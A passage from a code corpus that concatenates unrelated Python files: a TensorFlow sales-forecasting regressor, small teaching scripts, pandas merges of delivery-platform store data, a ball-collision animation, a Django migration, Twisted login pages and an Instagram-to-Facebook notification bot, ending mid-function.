    labels = ['last_{}week'.format(i) for i in range(1, 53)][:int(x["num_week"])]
    samples = [x[label] for label in labels]
    return np.var(samples)
def get_month_var(x):
    """Variance of the first num_month valid monthly values (translated)."""
    labels = ['last_{}month'.format(i) for i in range(1, 13)][:int(x["num_month"])]
    samples = [x[label] for label in labels]
    return np.var(samples)
def week_month_derive_feat(df):
    """Derive week-over-week and month-over-month difference features.

    Adds diff_week_N_M and diff_month_N_M columns (value of period N minus
    period M, where N = M + 1) and last_3month_sum (total sales over the most
    recent three months). Returns the mutated frame.
    """
    for newer in range(2, 53):
        older = newer - 1
        df["diff_week_{}_{}".format(newer, older)] = (
            df["last_{}week".format(newer)] - df["last_{}week".format(older)])

    for newer in range(2, 13):
        older = newer - 1
        df["diff_month_{}_{}".format(newer, older)] = (
            df["last_{}month".format(newer)] - df["last_{}month".format(older)])

    df["last_3month_sum"] = df["last_1month"] + df["last_2month"] + df["last_3month"]
    return df
class Model:
    """TF1 static graph: a 3-layer ReLU MLP regressor.

    Loss is mean absolute error; optimizer is Adam. Scalar loss summaries go
    to ./tmp/dnn_train and ./tmp/dnn_valid, and the prediction op is exported
    to the 'dnn_predict' collection for later restore.
    """
    def __init__(self, batch_size, input_size, output_size, learning_rate, num_units=[256, 128, 64]):
        # NOTE(review): batch_size is accepted but unused — the placeholders
        # use a dynamic batch dimension (None). The mutable default num_units
        # is never mutated, so it is harmless here.
        with tf.name_scope("placeholders"):
            self.X = tf.placeholder(tf.float32, (None, input_size), name='input_x')
            self.Y = tf.placeholder(tf.float32, (None, output_size), name='input_y')
        with tf.name_scope("dnn"):
            layer1 = tf.layers.dense(self.X, num_units[0], activation=tf.nn.relu)
            layer2 = tf.layers.dense(layer1, num_units[1], activation=tf.nn.relu)
            layer3 = tf.layers.dense(layer2, num_units[2], activation=tf.nn.relu)
        with tf.name_scope("prediction"):
            self.logits = tf.layers.dense(layer3, output_size)
        with tf.name_scope("loss"):
            # MAE ("L1") loss.
            self.loss = tf.reduce_mean(tf.abs(self.logits - self.Y))
        with tf.name_scope("optimizer"):
            self.optimizer = tf.train.AdamOptimizer(learning_rate).minimize(self.loss)
        with tf.name_scope("summaries"):
            tf.summary.scalar("loss", self.loss)
            self.merged = tf.summary.merge_all()
            self.train_writer = tf.summary.FileWriter('./tmp/dnn_train', tf.get_default_graph())
            self.valid_writer = tf.summary.FileWriter('./tmp/dnn_valid', tf.get_default_graph())
            tf.add_to_collection('dnn_predict', self.logits)
def data_process(df):
    """Build features and split the frame into train/valid/test sets.

    Pipeline: derive week/month features, volatility features, one-hot area
    and category columns; select the fixed feature list; fill NaNs with -1;
    split 60/20/20 (train/valid/test). Returns
    (X_train_X, y_train, X_test_X, y_test, X_valid_X, y_valid, X_train, X_test)
    where the *_X frames exclude the id columns and the external forecast.
    """
    # Week/month difference features (translated comments).
    df = week_month_derive_feat(df)
    # Volatility features: count/mean/variance of the valid recent periods.
    df["num_week"] = df.apply(lambda x: get_nonzero_week(x), axis=1)
    df["num_month"] = df.apply(lambda x: get_nonzero_month(x), axis=1)
    df["mean_week"] = df.apply(lambda x: get_mean_week(x), axis=1)
    df["mean_month"] = df.apply(lambda x: get_mean_month(x), axis=1)
    df["var_week"] = df.apply(lambda x: get_week_var(x), axis=1)
    df["var_month"] = df.apply(lambda x: get_month_var(x), axis=1)
    # One-hot region and category columns.
    df = areaid_dummy(df)
    df = cate_dummy(df)
    X_cols = ["productid", "propertyid", "areaid", "last_1week", "last_2week", "last_3week", "last_4week", "last_5week",
              "last_6week", "last_7week", "last_8week", "last_9week", "last_10week", "last_11week", "last_12week",
              "last_13week", "last_14week", "last_15week", "last_16week", "last_17week", "last_18week", "last_19week",
              "last_20week", "last_21week", "last_22week", "last_23week", "last_24week", "last_25week", "last_26week",
              "last_27week", "last_28week", "last_29week", "last_30week", "last_31week", "last_32week", "last_33week",
              "last_34week", "last_35week", "last_36week", "last_37week", "last_38week", "last_39week", "last_40week",
              "last_41week", "last_42week", "last_43week", "last_44week", "last_45week", "last_46week", "last_47week",
              "last_48week", "last_49week", "last_50week", "last_51week", "last_52week", "last_1month", "last_2month",
              "last_3month", "last_4month", "last_5month", "last_6month", "last_7month", "last_8month", "last_9month",
              "last_10month", "last_11month", "last_12month", "pred_1month", "instock", "stock_div_last_1week",
              "stock_div_last_2weeks", "stock_div_last_1month", 'diff_week_2_1', 'diff_week_3_2', 'diff_week_4_3',
              'diff_week_5_4', 'diff_week_6_5', 'diff_week_7_6', 'diff_week_8_7', 'diff_week_9_8', 'diff_week_10_9',
              'diff_week_11_10', 'diff_week_12_11', 'diff_week_13_12', 'diff_week_14_13', 'diff_week_15_14',
              'diff_week_16_15', 'diff_week_17_16', 'diff_week_18_17', 'diff_week_19_18', 'diff_week_20_19',
              'diff_week_21_20',
              'diff_week_22_21', 'diff_week_23_22', 'diff_week_24_23', 'diff_week_25_24', 'diff_week_26_25',
              'diff_week_27_26',
              'diff_week_28_27', 'diff_week_29_28', 'diff_week_30_29', 'diff_week_31_30', 'diff_week_32_31',
              'diff_week_33_32',
              'diff_week_34_33', 'diff_week_35_34', 'diff_week_36_35', 'diff_week_37_36', 'diff_week_38_37',
              'diff_week_39_38',
              'diff_week_40_39', 'diff_week_41_40', 'diff_week_42_41', 'diff_week_43_42', 'diff_week_44_43',
              'diff_week_45_44',
              'diff_week_46_45', 'diff_week_47_46', 'diff_week_48_47', 'diff_week_49_48', 'diff_week_50_49',
              'diff_week_51_50',
              'diff_week_52_51', 'diff_month_2_1', 'diff_month_3_2', 'diff_month_4_3', 'diff_month_5_4',
              'diff_month_6_5',
              'diff_month_7_6', 'diff_month_8_7', 'diff_month_9_8', 'diff_month_10_9', 'diff_month_11_10',
              'diff_month_12_11',
              'last_3month_sum', 'num_week', 'num_month', 'mean_week', 'mean_month', 'var_week', 'var_month',
              'categoryid_0',
              'categoryid_1', 'categoryid_2', 'categoryid_3', 'categoryid_4', 'categoryid_6', 'categoryid_7',
              'categoryid_8',
              'categoryid_9', 'categoryid_10', 'categoryid_11', 'categoryid_12', 'categoryid_13', 'categoryid_14',
              'categoryid_15',
              'categoryid_16', 'categoryid_18', 'categoryid_19', 'categoryid_20', 'categoryid_21', 'categoryid_22',
              'categoryid_23',
              'categoryid_26', 'categoryid_27', 'categoryid_28', 'categoryid_29', 'categoryid_30', 'categoryid_31',
              'categoryid_32',
              'categoryid_33', 'categoryid_34', 'categoryid_35', 'categoryid_36', "lev", "costprice", "spring",
              "summer", "autumn",
              "winter", "iscloth", 'areaid_0', 'areaid_1', 'areaid_3', 'areaid_5', 'areaid_6', 'areaid_7', 'arriveday']
    Y_cols = ["future_1month"]
    df["costprice"] = df["costprice"].astype("float")
    # Drop id columns and the external (Fuxi) forecast from the model inputs.
    X_cols_X = [col for col in X_cols if col not in ["productid", "propertyid", "areaid", "pred_1month"]]
    df.fillna(-1, inplace=True)
    X = df[X_cols]
    Y = df[Y_cols]
    # Train: fit the model; valid: pick hyper-parameters; test: measure
    # generalisation (translated comments).
    X_train_val, X_test, y_train_val, y_test = train_test_split(X, Y, test_size=0.2, random_state=1314)
    X_train, X_valid, y_train, y_valid = train_test_split(X_train_val, y_train_val, test_size=0.25, random_state=1314)
    X_train_X, X_test_X, X_valid_X = X_train[X_cols_X], X_test[X_cols_X], X_valid[X_cols_X]
    return X_train_X, y_train, X_test_X, y_test, X_valid_X, y_valid, X_train, X_test
def main():
    """Train the 3-layer DNN regressor with early stopping on validation MAE.

    Fixes vs. the original:
    - the mini-batch loop now steps through sample indices
      (range(0, n_samples, batch_size)); it previously stepped by batch_size
      through the *batch count* (n_samples // batch_size), so at most one
      batch per epoch was ever trained on;
    - the validation and test evaluations no longer run `model.optimizer`,
      which was silently training on the validation and test sets.
    """
    n_epochs = 10000
    batch_size = 512
    input_size = 184
    output_size = 1
    learning_rate = 0.01
    patience = 10
    data_file = os.path.join(os.getcwd(), "pandas_df.pickle")
    df = read_from_pickle(data_file)
    print(df.shape)
    print(df.head())
    X_train_X, y_train, X_test_X, y_test, X_valid_X, y_valid, train_l, test_l = data_process(df)
    with tf.Session() as sess:
        model = Model(batch_size, input_size, output_size, learning_rate, num_units=[256, 128, 64])
        sess.run(tf.global_variables_initializer())
        saver = tf.train.Saver(max_to_keep=3)
        best_val_loss = np.Inf
        wait = 0
        for epoch in range(n_epochs):
            total_mae, total_rmse = [], []
            val_mae, val_rmse = [], []
            test_mae, test_rmse = [], []
            # Mini-batch pass over the whole training set.
            for i in range(0, X_train_X.shape[0], batch_size):
                X = X_train_X.iloc[i:(i + batch_size), :].values
                Y = y_train.iloc[i:(i + batch_size), :].values
                logits_, loss_, _, summary = sess.run(
                    [model.logits, model.loss, model.optimizer, model.merged],
                    feed_dict={model.X: X, model.Y: Y})
                model.train_writer.add_summary(summary, i * (epoch + 1))
                total_mae.append(loss_)
                total_rmse.append(np.sqrt(mean_squared_error(logits_, Y)))
            # Validation: forward pass only — no optimizer op.
            val_logits_, val_loss_, val_summary = sess.run(
                [model.logits, model.loss, model.merged],
                feed_dict={model.X: X_valid_X.iloc[:, :].values,
                           model.Y: y_valid.iloc[:, :].values})
            model.valid_writer.add_summary(val_summary, epoch)
            val_mae.append(val_loss_)
            val_rmse.append(np.sqrt(mean_squared_error(val_logits_, y_valid.iloc[:, :].values)))
            # Test: forward pass only, to monitor generalisation.
            test_logits_, test_loss_, _ = sess.run(
                [model.logits, model.loss, model.merged],
                feed_dict={model.X: X_test_X.iloc[:, :].values,
                           model.Y: y_test.iloc[:, :].values})
            test_mae.append(test_loss_)
            test_rmse.append(np.sqrt(mean_squared_error(test_logits_, y_test.iloc[:, :].values)))
            print("epoch #" + str(epoch), "Train mae:", np.mean(total_mae), "Train rmse:", np.mean(total_rmse),
                  "Val mae:", np.mean(val_mae), "Val rmse:", np.mean(val_rmse),
                  "Test mae:", np.mean(test_mae), "Test rmse:", np.mean(test_rmse))
            # Early stopping: save a checkpoint and stop after `patience`
            # consecutive epochs without a new best validation MAE.
            if val_loss_ < best_val_loss:
                best_val_loss = val_loss_
                wait = 0
            else:
                if wait >= patience:
                    saver_path = saver.save(sess, './data/model.ckpt')
                    print("当前epoch:", epoch, "最佳验证集的mae连续%d次Epoch没达到最佳精度,则精度不再提高!" % (patience), "最优mae:", best_val_loss)
                    break
                wait += 1
if __name__ == "__main__":
main()
|
993,543 | fced17102b89828cedad41abefb5c1d9639dd56a | # -*- coding: utf-8 -*-
"""
Name : c7_16_def_sharpe_ratio.py
Book : Python for Finance (2nd ed.)
Publisher: Packt Publishing Ltd.
Author : Yuxing Yan
Date : 6/6/2017
email : yany@canisius.edu
paulyxy@hotmail.com
"""
def sharpeRatio(ticker,begdate=(2012,1,1),enddate=(2016,12,31)):
    """Objective: estimate Sharpe ratio for stock
       ticker  : stock symbol
       begdate : beginning date
       enddate : ending date

       Example #1: sharpeRatio("ibm")
                     0.0068655583807256159

       Example #2: date1=(1990,1,1)
                   date2=(2015,12,23)
                   sharpeRatio("ibm",date1,date2)
                     0.027831010497755326
    """
    import scipy as sp
    # NOTE(review): matplotlib.finance was removed from matplotlib (moved to
    # the separate mpl_finance package), and the Yahoo quote downloader it
    # provided no longer works — this function needs a new data source.
    from matplotlib.finance import quotes_historical_yahoo_ochl as getData
    p = getData(ticker,begdate, enddate,asobject=True,adjusted=True)
    # Simple daily returns from adjusted closes.
    ret=p.aclose[1:]/p.aclose[:-1]-1
    # NOTE(review): sp.mean/sp.std are removed in modern SciPy; use numpy
    # equivalents when this is revived. Ratio is per-period (not annualised).
    return sp.mean(ret)/sp.std(ret)
|
993,544 | 778f4ffd466f73ccdb38784c06f86e532ad9c32b | def find_small(lst):
small = lst[0]
small_index = 0
for i in range(1, len(lst)):
if lst[i] < small:
small = lst[i]
small_index = i
return small_index
def selection_sort(lst):
    """Return a new list containing lst's elements in ascending order.

    Fix: the original popped elements directly from the caller's list,
    leaving it empty after the call; we now sort a copy so the input
    survives intact. Sorting is stable on ties (first minimum is taken).
    """
    remaining = list(lst)  # work on a copy so the caller's list is untouched
    ordered = []
    while remaining:
        smallest = min(range(len(remaining)), key=remaining.__getitem__)
        ordered.append(remaining.pop(smallest))
    return ordered
# Quick demo run.
sample = [25, 100, 225, 14, 19, 12]
print(selection_sort(sample))
|
993,545 | 21af862aa9985e6380a275630963c5d4342c1c55 | test_names = ['Quiz1', 'Quiz2', 'Midterm', 'Final']
test_grades = [100,70,86,95]
print('first item in list is', test_grades[0])
print('the list is', test_grades)
the_sum = 0
for the_grade in test_grades:
the_sum += the_grade
print('there are', len(test_grades), 'items in the list')
print(the_sum / len(test_grades))
try:
test_grades[10] = 100
test_grades[-1] = 100
except IndexError:
print('error with index number')
print('the list is', test_grades)
the_sum = 0
for the_grade in test_grades:
the_sum += the_grade
print('there are', len(test_grades), 'items in the list')
print(the_sum / len(test_grades))
|
993,546 | 825229e6c2a1fed2e918496f2b91847373c55f09 | #!/usr/bin/python
# -*- coding: UTF-8 -*
import pandas as pd
import os
import numpy as np
def ELM(Efile_dir):
    """Merge every ele.me store workbook in `Efile_dir` into E_result.xlsx.

    Each source file's name (minus the .xlsx suffix) becomes the 地区 (region)
    column, with platform fixed to 饿了么.

    Fix: the region was cleaned with str.strip('.xlsx'), which strips any
    leading/trailing characters from the set {., x, l, s} and can eat
    legitimate parts of the name; an anchored regex suffix replace is used
    instead. The redundant manual counter was replaced by the loop variable.
    NOTE(review): E_result.xlsx is written into the source directory, so a
    second run would try to re-read it — consider a separate output dir.
    """
    Enew_filename = Efile_dir + '/E_result.xlsx'
    Efile_list = os.listdir(Efile_dir)
    print("文件夹中有{}个文件".format(len(Efile_list)))
    print('-'*100)
    E_list = []
    for file in Efile_list:
        file_path = os.path.join(Efile_dir, file)
        print(file_path)
        df_e = pd.read_excel(file_path, sheet_name='门店数据')
        df_e['地区'] = file  # region label = source file name (suffix removed below)
        E_list.append(df_e)
    df_E = pd.concat(E_list)
    df_E['地区'] = df_E['地区'].str.replace(r'\.xlsx$', '', regex=True)
    df_E['平台'] = '饿了么'
    df_E = pd.DataFrame(df_E[['门店名称','地区','平台','曝光人数','进店人数','下单人数']])
    df_E.to_excel(Enew_filename, index=False)
    print('饿了么数据处理完毕!')
    print('-'*100)
#-------------------------------------------------------------------------------------------------------------
def JD(file_dir):
    """Merge all JD-daojia store spreadsheets in file_dir into JD_result.xlsx.

    Reads the first sheet of every file, tags rows with their source region
    (file name minus .xlsx) and the platform, renames the JD column names to
    the shared schema, then writes the combined selection of columns.
    """
    new_filename = file_dir + '/JD_result.xlsx'
    file_list = os.listdir(file_dir)
    print("文件夹中有{}个文件".format(len(file_list)))
    print('-'*100)
    new_list = []
    for file in file_list:  # the file name itself is the region tag
        file_path = os.path.join(file_dir, file)
        print(file_path)
        df = pd.read_excel(file_path, sheet_name=0)
        df['地区'] = file
        new_list.append(df)
    df_jd = pd.concat(new_list)
    # BUG FIX: remove only a trailing '.xlsx' (str.strip('.xlsx') removed any
    # of the characters . x l s from both ends of the region name).
    df_jd['地区'] = df_jd['地区'].str.replace(r'\.xlsx$', '', regex=True)
    df_jd['平台'] = '京东到家'
    # Map JD's column names onto the shared report schema.
    df_jd.rename(columns={'浏览量':'曝光人数','访客数':'进店人数','有效订单数':'下单人数'}, inplace=True)
    df_jd = pd.DataFrame(df_jd[['门店名称','地区','平台','曝光人数','进店人数','下单人数']])
    df_jd.to_excel(new_filename, index=False)
    print('京东数据处理完成!')
    print('-'*100)
# #-------------------------------------------------------------------------------------------------------------
def MT(file_dir):
    """Merge all Meituan store CSV exports in file_dir into MT_result.xlsx.

    Tags rows with their source region (file name minus .csv) and the
    platform, renames Meituan's column names to the shared schema, then
    writes the combined selection of columns.
    """
    new_filename = file_dir + '/MT_result.xlsx'
    file_list = os.listdir(file_dir)
    print("文件夹中有{}个文件".format(len(file_list)))
    print('-'*100)
    new_list = []
    for file in file_list:  # the file name itself is the region tag
        file_path = os.path.join(file_dir, file)
        print(file_path)
        # BUG FIX: pass the path straight to pandas; the previous
        # `f = open(file_path)` handle was never closed (resource leak).
        df = pd.read_csv(file_path)
        df['地区'] = file
        new_list.append(df)
    df_mt = pd.concat(new_list)
    # BUG FIX: remove only a trailing '.csv' (str.strip('.csv') removed any
    # of the characters . c s v from both ends of the region name).
    df_mt['地区'] = df_mt['地区'].str.replace(r'\.csv$', '', regex=True)
    df_mt['平台'] = '美团'
    df_mt.rename(columns={'曝光人数(人)':'曝光人数','入店人数(人)':'进店人数','下单人数(人)':'下单人数'}, inplace=True)
    df_mt = pd.DataFrame(df_mt[['门店名称','地区','平台','曝光人数','进店人数','下单人数']])
    df_mt.to_excel(new_filename, index=False)
    print('美团数据处理完成!')
    print('-'*100)
#-------------------------------------------------------------------------------------------------------------
# Input directories for this run (edit these paths before running).
E_dir=r'E:/日常数据/O2O/2020/2020年1月追踪表/周报0116/曝光/饿百/'# fill in the data directory path
# JD_dir=r'E:/19年月度资料汇总/12月资料汇总/曝光/京东/'
MT_dir=r'E:/日常数据/O2O/2020/2020年1月追踪表/周报0116/曝光/美团/'
ELM(E_dir)
# JD(JD_dir)  # JD processing is currently disabled
MT(MT_dir)
|
993,547 | b49fab612a0426e310d27d2f68e786a26b8b55fc | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @author: D. Roma
#
# 2014/10/29 First issue
# TODO:
# - Balls hang between them
# - Balls "hangs" on the wall
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from Balls import Balls
class Box():
    '''
    Container for the balls and driver of the matplotlib animation.

    Properties:
        balls -- list of Balls objects being simulated
    '''
    line = None          # unused placeholder for a line artist
    wall_height = 10     # box height in plot units
    wall_length = 10     # box width in plot units
    def __init__(self, initial_positions, initial_velocities, masses, radius, \
                        dt = 1e-3, debug = False):
        # Build one Balls object per row of initial_positions.
        self.balls = []
        for i, item in enumerate(initial_positions):
            self.balls.append(Balls(item, initial_velocities[i], masses[i], radius[i]))
        # Simulation parameters are shared class-wide on Balls.
        Balls.dt = dt
        Balls.wall_height = self.wall_height
        Balls.wall_length = self.wall_length
        self.number_of_balls = initial_positions.shape[0]
        self.debug = debug
        self.radius = radius
        self.fig = plt.figure()
        self.ax = plt.axes(xlim=(0, self.wall_length), ylim=(0, self.wall_height))
        self.colors = np.random.random([self.number_of_balls, 3])
        self.patches = self.setup_plot()
        # Using setup_plot as the init_func parameter of FuncAnimation
        # led to strange results, so it is called explicitly above.
        self.ani = animation.FuncAnimation(self.fig, self.update_plot, interval=dt*1000,
                                           blit=True)
        plt.show()
    def setup_plot(self):
        # Create one Circle patch per ball and keep them for blitting.
        pos = self.getPositions()
        if self.debug:
            print(pos)
        patches = []
        for i, item in enumerate(self.radius):
            patch = plt.Circle(pos[i], item, color=self.colors[i])
            self.ax.add_patch(patch)
            patches.append(patch)
        # NOTE(review): ax.clear() wipes the patches just added above; the
        # circles only reappear because update_plot returns them for
        # blitting.  Confirm the clear() is intentional.
        self.ax.clear()
        self.ax.grid(True)
        self.ax.set_title('Elastic collision')
        self.patches = tuple(patches)
        return tuple(patches)
    def getPositions(self):
        # Current (x, y) of every ball as an (N, 2) array.
        pos = np.empty([self.number_of_balls, 2])
        for i, item in enumerate(self.balls):
            pos[i, 0], pos[i, 1] = item.getPosition()
        return pos
    def getVelocities(self):
        # Current velocity vector of every ball as an (N, 2) array.
        vel = np.empty([self.number_of_balls, 2])
        for i, item in enumerate(self.balls):
            vel[i] = item.velocity
        return vel
    def nextInstant(self):
        # Advance every ball one time step and resolve pairwise collisions.
        pos = np.empty([self.number_of_balls, 2])
        for i, item in enumerate(self.balls):
            pos[i, 0], pos[i, 1] = item.updatePosition()
            # Only pair with later balls so each collision is handled once.
            # (The +1 in the slice end is harmless: slices clamp to len.)
            for ball in self.balls[i+1:self.number_of_balls + 1]:
                colision = item.check_ball_collision(ball)
                if colision:
                    item.resolve_collision(ball)
        return pos
    def update_plot(self, counter):
        # FuncAnimation callback: move each patch to its ball's new position.
        pos = self.nextInstant()
        if self.debug:
            print(pos)
        for i, patch in enumerate(self.patches):
            patch.center = pos[i]
        # We need to return the updated artists for FuncAnimation to draw.
        return self.patches
|
993,548 | 5b62bdbd20a4077833b8e4dfd0e3441c2e0a706b | $NetBSD$
Fix manual page directory.
--- setup.py.orig 2016-06-01 18:43:46.000000000 +0000
+++ setup.py
@@ -49,7 +49,7 @@ setup(name='Canto-curses',
library_dirs = ["/usr/local/lib", "/opt/local/lib"],
include_dirs = ["/usr/local/include", "/opt/local/include"])],
scripts=['bin/canto-curses'],
- data_files = [("share/man/man1/", ["man/canto-curses.1"]),
+ data_files = [(os.getenv("PKGMANDIR")+"/man1/", ["man/canto-curses.1"]),
("lib/canto/plugins/", glob.glob('plugins/*.py'))],
cmdclass = { 'install_data' : canto_curses_install_data,
'build_py' : canto_curses_build_py},
|
993,549 | ffca9b00f581fcb9a468c4ebc2283eae180d6249 | # encoding: utf8
from django.db import models, migrations
class Migration(migrations.Migration):
    """Initial schema for the rango app: Category and Page tables."""
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),
                # Category names must be unique site-wide.
                ('name', models.CharField(max_length=128, unique=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Page',
            fields=[
                ('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),
                # Each page belongs to exactly one category.
                ('category', models.ForeignKey(to_field='id', to='rango.Category')),
                ('title', models.CharField(max_length=128)),
                ('url', models.URLField()),
                ('views', models.IntegerField(default=0)),  # view counter, starts at 0
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]
|
993,550 | 79f0f740f67a4e2fa2bb1c26b90c440f84d8b6a0 | """
* view.common.uiobj.Style.py
*
* Copyright Synerty Pty Ltd 2013
*
* This software is proprietary, you are not free to copy
* or redistribute this code in any format.
*
* All rights to this software are reserved by
* Synerty Pty Ltd
*
"""
from twisted.web._flatten import flattenString
from twisted.web.resource import Resource
from twisted.web.server import NOT_DONE_YET
from txhttputil.login_page.LoginElement import LoginElement
class LoginResource(Resource):
    """Renders the login page; a POST back here means a prior attempt failed."""
    isLeaf = True

    def render_GET(self, request):
        return self._renderLogin(request)

    def render_POST(self, request):
        # A POST to this resource means the submitted credentials failed.
        return self._renderLogin(request, failed=True)

    def _renderLogin(self, request, failed=False):
        """Flatten the LoginElement template asynchronously into the response.

        Returns NOT_DONE_YET; the deferred's callbacks finish the request.
        """
        request.responseHeaders.setRawHeaders("authorization", ["basic"])

        def write(data):
            request.write(b'<!DOCTYPE html>\n')
            request.write(data)
            request.finish()

        def error(failure):
            # BUG FIX: the previous version wrote a str where bytes are
            # required, referenced the non-existent request.request, and used
            # the return value of printDetailedTraceback() (which returns
            # None — it prints instead).  getTraceback() returns the text.
            request.write(b'<!DOCTYPE html>\n')
            request.write(failure.getTraceback().encode('utf-8'))
            request.finish()

        d = flattenString(request, LoginElement(failed=failed))
        d.addCallbacks(write, error)
        return NOT_DONE_YET
class LoginSucceededResource(Resource):
    """Served after a successful login: redirects the client back to the
    requested URI so it is re-fetched with the new credentials in effect.

    NOTE(review): request.redirect(request.uri) points back at this same
    resource — confirm an upstream wrapper serves different content once
    the session is authenticated, otherwise this loops.
    """
    isLeaf = True
    def render_GET(self, request):
        return self._render(request)
    def render_POST(self, request):
        return self._render(request)
    def _render(self, request):
        request.redirect(request.uri)
        request.finish()
        return NOT_DONE_YET
|
993,551 | 89b06ee397b462664cde00143807a73c837b1db8 | def main():
N = int(input())
a = [0] + list(map(int, input().split()))
b = [0] * (N + 1)
for i in range(N,0,-1):
sum = 0
for j in range(2*i, N+1, i):
sum += b[j]
if sum % 2 != a[i] % 2:
b[i] = 1
ans = []
for i in range(1,N+1):
if b[i] == 1:
ans.append(i)
print(len(ans))
print(*ans)
main() |
993,552 | 0a9dcddc815dee7d1e73c3c0fbd3969a3347ef71 | import argparse
# from fbchat.models import *
import logging
import os
import sys
import urllib.request
from getpass import getpass
from time import sleep
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from fbchat import Client
from API.InstagramAPI import InstagramAPI
from databaseUtils import Database
logger = logging.getLogger('instagramNotifier')
hdlr = logging.FileHandler('instagramNotifier.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.INFO)
database = Database('InstagramNotifier.db')
MESSAGE_HEADER = 'Check out the new %s\'s photo on instagram! \n'
MESSAGE_BODY = 'The photo was taken in %s, it has size %sx%s and as we can see it is of great quality :) \n'
MESSAGE_FOOTER = 'This was generated by a bot to help you by notifying you of everything that is important. ' \
'Do not consider it as spam.\n'
def login(user_, passw):
    """Attempt an Instagram login.

    Returns (True, api) on success, or (False, '') when login fails.
    """
    api = InstagramAPI(username=user_, password=passw)
    success = api.login()
    return (True, api) if success else (False, '')
def follow_closely(api_, follow_username):
    """Find follow_username among the accounts the logged-in user follows.

    Pages through the full "following" list (Instagram returns it in
    chunks), then returns (True, user_dict) if found, or (False, None)
    otherwise.
    """
    big_list = True
    max_id = ''
    following = []
    while big_list:
        api_.getSelfUsersFollowing(maxid=max_id)
        followers_ = api_.LastJson
        for f in followers_['users']:
            following.append(f)
        big_list = followers_['big_list']
        if not big_list:
            break
        # this key only exists when there are more pages
        max_id = followers_['next_max_id']
    for f in following:
        if f['username'] == follow_username:
            return True, f
    # BUG FIX: previously fell off the end returning None, so the caller's
    # `flag, info = follow_closely(...)` raised TypeError instead of
    # reporting "not following".
    return False, None
def get_message(message_type, source, data=None):
    """Build the notification text for a new post by `source`.

    message_type 'image': downloads the photo to ./tmp.jpg as a side effect
    (the caller attaches it and then deletes it) and returns header + body;
    the footer is sent separately by the caller in that branch.
    Any other message_type: returns header + footer with no download.
    """
    if message_type == 'image':
        header = (MESSAGE_HEADER % source)
        body = (MESSAGE_BODY % (data['location'], data['width'], data['height']))
        urllib.request.urlretrieve(data['last_media'], 'tmp.jpg')
        return header + body
    else:
        header = (MESSAGE_HEADER % source)
        return header + MESSAGE_FOOTER
def alert(user, follow, data, client_fb):
    """Notify every registered Facebook recipient about `follow`'s new post.

    user / follow are Instagram usernames; data describes the new media.
    """
    users_notify = database.get_from_notify(username=user, username_follow=follow)
    # BUG FIX: the loop variable used to be named `user`, shadowing the
    # parameter and corrupting the "User %s notified" log line below.
    for target in users_notify:
        if target['thread_type'] == '0':  # NOTE(review): stored as a string — confirm
            if target['image_flag']:
                message = get_message(message_type='image', source=follow, data=data)
                client_fb.sendLocalImage(image_path='tmp.jpg', message=message, thread_id=str(target['thread_id']))
                client_fb.sendMessage(message=MESSAGE_FOOTER, thread_id=str(target['thread_id']))
                logger.info('User %s notified %s on facebook.', user, str(target['thread_id']))
                # clean image created by get_message
                os.remove('tmp.jpg')
            else:
                message = get_message(message_type='no_image', source=follow)
                client_fb.sendMessage(message=message, thread_id=str(target['thread_id']))
                logger.info('%s got notified on facebook.', str(target['thread_id']))
def run(api_, user_):
    """Run the bot: log in to Facebook, then poll Instagram every 2 minutes
    and alert subscribers whenever a closely-followed account posts."""
    email_fb = input('Facebook email: ')
    pass_fb = getpass(prompt='Facebook password: ')
    client_fb = Client(email=email_fb, password=pass_fb, logging_level=logging.CRITICAL)
    try:
        print('Running..')
        while True:
            follows = database.get_from_follows(username=user_)
            medias = database.get_from_media(username=user_)
            for f_closely, username_follow, id_ in follows:
                # NOTE(review): this fetch duplicates get_info() except for
                # the KeyError handling (here it continues, there it exits).
                data = dict(last_media_id=0, media_count=0, user_id=0, last_media='', width=0, height=0, location='')
                data['user_id'] = f_closely
                api_.getUsernameInfo(str(f_closely))
                media_results = api_.LastJson
                data['media_count'] = media_results['user']['media_count']
                api_.getUserFeed(str(f_closely))
                media_results = api_.LastJson
                last_media = media_results['items'][0]
                try:
                    data['last_media_id'] = int(last_media['pk'])
                    data['last_media'] = last_media['image_versions2']['candidates'][0]['url']
                    data['width'] = last_media['image_versions2']['candidates'][0]['width']
                    data['height'] = last_media['image_versions2']['candidates'][0]['height']
                    data['location'] = last_media['location']['name']
                except KeyError:
                    # for debugging; some posts lack location/image fields
                    print('KeyError')
                # Compare with the last media id stored for this account.
                data_ = [media for media in medias if media['user_id'] == data['user_id']][0]
                if data['last_media_id'] != data_['last_media_id']:
                    alert(user=user_, follow=username_follow, data=data, client_fb=client_fb)
                # Update info on database
                database.update_media(last_media_id=data['last_media_id'], media_count=data['media_count'],
                                      foreign_id=id_, last_media=data['last_media'], width=data['width'],
                                      height=data['height'],
                                      location=data['location'], last_media_id_=data_['last_media_id'])
                logger.info('Update media for user %s.', data['user_id'])
            print('Sleeping')
            sleep(120)
    except KeyboardInterrupt:
        print('Interrupted!')
def get_info(api_, user_id):
    """Fetch profile and latest-post details for user_id.

    Returns a dict with the fields needed to detect and describe a new post.
    """
    data = dict(last_media_id=0, media_count=0, user_id=0, last_media='', width=0, height=0, location='')
    data['user_id'] = user_id
    api_.getUsernameInfo(user_id)
    media_results = api_.LastJson
    data['media_count'] = media_results['user']['media_count']
    api_.getUserFeed(user_id)
    media_results = api_.LastJson
    last_media = media_results['items'][0]  # most recent post
    try:
        data['last_media_id'] = int(last_media['pk'])
        data['last_media'] = last_media['image_versions2']['candidates'][0]['url']
        data['width'] = last_media['image_versions2']['candidates'][0]['width']
        data['height'] = last_media['image_versions2']['candidates'][0]['height']
        data['location'] = last_media['location']['name']
    except KeyError:
        # for debugging
        print('KeyError')
        # NOTE(review): exit() terminates the whole process when a feed item
        # lacks a field (e.g. no location) — consider partial data instead.
        exit()
    return data
def validate_user(user_, passw, service):
